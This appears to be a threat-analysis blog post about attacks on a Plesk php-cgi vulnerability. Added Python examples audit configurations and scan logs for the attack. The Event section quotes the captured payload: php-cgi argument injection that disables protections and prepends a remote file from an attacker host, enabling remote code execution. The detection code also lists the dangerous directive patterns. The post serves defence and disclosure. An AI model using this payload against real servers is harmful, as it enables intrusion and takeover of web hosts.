Background on Six Month Old Vulnerability Exploit Attempt

The IBM X-Force Threat Analysis Service (XFTAS) reports on vulnerabilities that need to be brought to the attention of our customers. Such was the case in June of 2013. We found a report on a Plesk Control Panel vulnerability (CVE-2013-4878) and provided the following assessment at that time:

Critical Plesk Vulnerability

Exploit code has been released that is reported to target versions 8.6, 9.0, 9.2, 9.3, and 9.5.4 of Plesk running on the Linux and FreeBSD operating systems. Plesk is a commercial software web administration package that allows an administrator to easily set up new websites, email accounts, and DNS entries via a web-based interface. The vulnerability is reported to rely on a non-default setting in Plesk which exposes the entire /usr/bin directory to the Internet. An attacker who successfully exploits this vulnerability can gain shell access to the victim’s server. Customers should verify that the following Plesk configuration entry is not present:

ScriptAlias /phppath/ "/usr/bin/"

Plesk administrators should contact their distribution channels for more information regarding configuration best practices.
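To make the check above repeatable, here is an added example (not IBM or Plesk code) that audits Apache-style configuration text for a ScriptAlias whose target is a system binary directory. The directory list beyond /usr/bin and the sample config file paths are assumptions for illustration.

```python
import re
from pathlib import Path

# Directories whose exposure via ScriptAlias lets a remote client invoke
# arbitrary system binaries (php-cgi among them). /usr/bin is the one named
# in the advisory; the others are an assumed defensive superset.
EXPOSED_BIN_DIRS = ("/usr/bin", "/usr/local/bin", "/bin")

SCRIPTALIAS_RE = re.compile(
    r'^\s*ScriptAlias(?:Match)?\s+(\S+)\s+"?([^"\s]+)"?', re.IGNORECASE)

def find_exposed_scriptaliases(config_text):
    """Return (url_prefix, fs_path) for every ScriptAlias line that maps a
    URL prefix onto a system binary directory. Comment lines are skipped
    because the regex anchors on the directive at line start."""
    hits = []
    for line in config_text.splitlines():
        m = SCRIPTALIAS_RE.match(line)
        if not m:
            continue
        url_prefix, fs_path = m.group(1), m.group(2).rstrip("/")
        if any(fs_path == d or fs_path.startswith(d + "/") for d in EXPOSED_BIN_DIRS):
            hits.append((url_prefix, fs_path))
    return hits

def audit_config_files(paths):
    """Read each config file that exists and collect exposed aliases per file."""
    findings = {}
    for p in paths:
        path = Path(p)
        if path.is_file():
            hits = find_exposed_scriptaliases(path.read_text(errors="replace"))
            if hits:
                findings[str(path)] = hits
    return findings

# Constructed sample: a normal cgi-bin alias plus the dangerous entry from the advisory.
SAMPLE_CONFIG = """\
ScriptAlias /cgi-bin/ "/var/www/cgi-bin/"
# comment that mentions ScriptAlias /phppath/ "/usr/bin/" and must not match
ScriptAlias /phppath/ "/usr/bin/"
"""

if __name__ == "__main__":
    # Assumed locations of the Plesk-managed Apache config; adjust per host.
    for f, hits in audit_config_files(["/etc/httpd/conf/httpd.conf"]).items():
        print(f, hits)
    for url, fs in find_exposed_scriptaliases(SAMPLE_CONFIG):
        print(f"EXPOSED: {url} -> {fs}")
```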

Event

During the weekend of January 4th, the SOC began seeing attacks on our customers that appeared to be attempting to exploit this vulnerability. The payload of these attacks looked like this:

-d+allow_url_include=on+-d+safe_mode=off+-d+suhosin.simulation=on+-d+max_execution_time=0+-d+open_basedir=none+-d+auto_prepend_file=hXXp://isp.vc/packets.txt+-d+cgi.force_redirect=0+-d+cgi.redirect_status_env=0+-n
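The payload is a php-cgi argument injection: "+" separates argv entries and each "-d key=value" overrides a php.ini directive. As an added example (not part of the original post), the following detection logic decodes that query-string form from web server request lines and flags the dangerous override combination; the sample log lines are constructed, and the set of flagged directives is an assumption chosen from the payload above.

```python
from urllib.parse import unquote

# php.ini overrides that, injected via "-d", together turn a request into
# remote code execution (remote prepend file + URL includes, protections off).
SUSPICIOUS_OVERRIDES = {
    "allow_url_include": lambda v: v.lower() in ("on", "1"),
    "auto_prepend_file": lambda v: v.lower().startswith(("http", "hxxp", "ftp")),
    "safe_mode": lambda v: v.lower() in ("off", "0"),
    "open_basedir": lambda v: v.lower() == "none",
    "cgi.force_redirect": lambda v: v == "0",
}

def parse_cgi_args(query_string):
    """Split a php-cgi argument-injection query string into a directive map.
    '+' separates argv entries; '-d key=value' sets a php.ini directive."""
    argv = [unquote(tok) for tok in query_string.split("+") if tok]
    directives = {}
    i = 0
    while i < len(argv):
        if argv[i] == "-d" and i + 1 < len(argv) and "=" in argv[i + 1]:
            key, _, value = argv[i + 1].partition("=")
            directives[key] = value
            i += 2
        else:
            i += 1
    return directives

def detect_php_cgi_injection(request_line):
    """Return the sorted list of suspicious directives found in one request
    line such as 'GET /phppath/php?-d+allow_url_include=on+... HTTP/1.1'."""
    parts = request_line.split(" ", 2)
    if len(parts) < 2:
        return []
    _, _, query = parts[1].partition("?")
    directives = parse_cgi_args(query)
    return sorted(k for k, v in directives.items()
                  if k in SUSPICIOUS_OVERRIDES and SUSPICIOUS_OVERRIDES[k](v))

def scan_log(lines):
    """Return (line, hits) for every line carrying at least one suspicious override."""
    results = []
    for line in lines:
        hits = detect_php_cgi_injection(line)
        if hits:
            results.append((line, hits))
    return results

# Constructed sample: one benign request and one carrying the payload from the post.
SAMPLE_LOG = [
    "GET /index.php?page=1 HTTP/1.1",
    "GET /phppath/php?-d+allow_url_include=on+-d+safe_mode=off+-d+suhosin.simulation=on"
    "+-d+max_execution_time=0+-d+open_basedir=none+-d+auto_prepend_file=hXXp://isp.vc/packets.txt"
    "+-d+cgi.force_redirect=0+-d+cgi.redirect_status_env=0+-n HTTP/1.1",
]
```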

Actions Taken

The SOC escalated the event to management and began contacting affected customers. Further analysis of the attack revealed only one attacking IP, 80.82.78.9. It also gave a strong indication that the attack was against the Internet as a whole and not any specific customer or industry. While researching the attack, we saw that other organizations, such as ISC, were aware of activity from this IP address as well. In their report, however, the attack they noted appeared to be targeting potentially vulnerable Linksys devices.

Data Seen

The top ten signatures seen in connection with this attack were:

Count     Signature
-------   ---------------------------------------------------------------------------------
206,235   TCP_Service_Sweep
10,394    HTTP: Detect PHP-CGI Remote code Execution vulnerability
3,477     PHP Remote Code Execution
2,212     TCP_Probe_Other
1,803     ICMP_Flood
820       SERVER-WEBAPP PHP-CGI remote file include attempt
453       PHP CGI Query String Parameter Handling Information Disclosure and DoS Vulnerability (34804)
450       SYNFlood
227       TCP SYN Host Sweep
177       PHP CGI Query String Parameter Handling Code Injection Vulnerability (34790)

This is a common tactic among attackers. First they scan for open ports and then, based on their recon, select an appropriate attack vector from the exploits they have in stock.

Summary and Recommendations

Attacks such as this one only reinforce the XFTAS recommendation to keep operating systems and applications patched in a timely manner. Attacks against new vulnerabilities do not always occur immediately after their announcement; sometimes, as in this case, it may be months before the vulnerability is exploited.
